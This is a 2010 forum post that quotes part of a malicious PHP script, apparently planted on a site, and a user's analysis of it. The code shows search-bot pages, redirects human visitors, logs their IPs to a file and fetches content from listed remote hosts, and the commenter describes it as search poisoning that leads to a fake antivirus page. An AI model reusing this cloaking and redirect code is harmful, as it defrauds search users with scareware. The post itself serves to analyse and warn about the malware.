window.location=;".chr(10)."</script>".chr(10); $fp=fopen($lndfile,"w+");fwrite($fp,$content);fclose($fp);chmod ($lndfile, 0777); } else $content = file_get_contents($lndfile); $content = str_replace("&ttl=", "&q=".str_replace(" ", "+", $_GET["q"])."&ttl=", $content); return $content; } function countstat() { $inf = date("Y-m-d H:i:s") . "|" . $ua . "|" . $_SERVER["REMOTE_ADDR"] . "|" . $_SERVER["REQUEST_URI"] . "
"; $fp = fopen("count.txt", "a"); fwrite($fp, $inf); fclose($fp); return true; } @mkdir("./.cache"); @chmod("./.cache", 0777); init(); countstat(); if ($q = $_GET["q"]) { if (is_search_bots()) { $q = str_replace("-", " ", $q); print sendPage($q); exit; } else { print redirect(); exit; } } else { header("HTTP/1.0 404 Not Found"); } ?>
    PHP:
    To me, it looks like what this script does is first it checks google for hot trending topics and gets related keywords, then it makes a bunch of links on the page linking to those keywords, probably to get indexed by a search engine. Then, when a user clicks one of the keywords, it sends them to a rouge fake antivirus scanner page. It also hides itself from regular users clicking and returns 404 not found error, unless it detects your a search crawler bot, then it shows you a page with links. Those links are indexed and when someone clicks a fake link in google, it pulls the url from http://originalmix.co.cc/1.php and sends the user there.

    It pulls data from the following sites:

    http://pepelac.byethost4.com/htaccess
    http://pepelac.byethost4.com/style
    http://pepelac.byethost4.com/default
    http://originalmix.co.cc/1.php

    (And google of course)

    Feel free to correct me, I only took a quick look at it.

    Defiantly malicious.
     
    Last edited: Apr 24, 2010
    Brad33, Apr 24, 2010 IP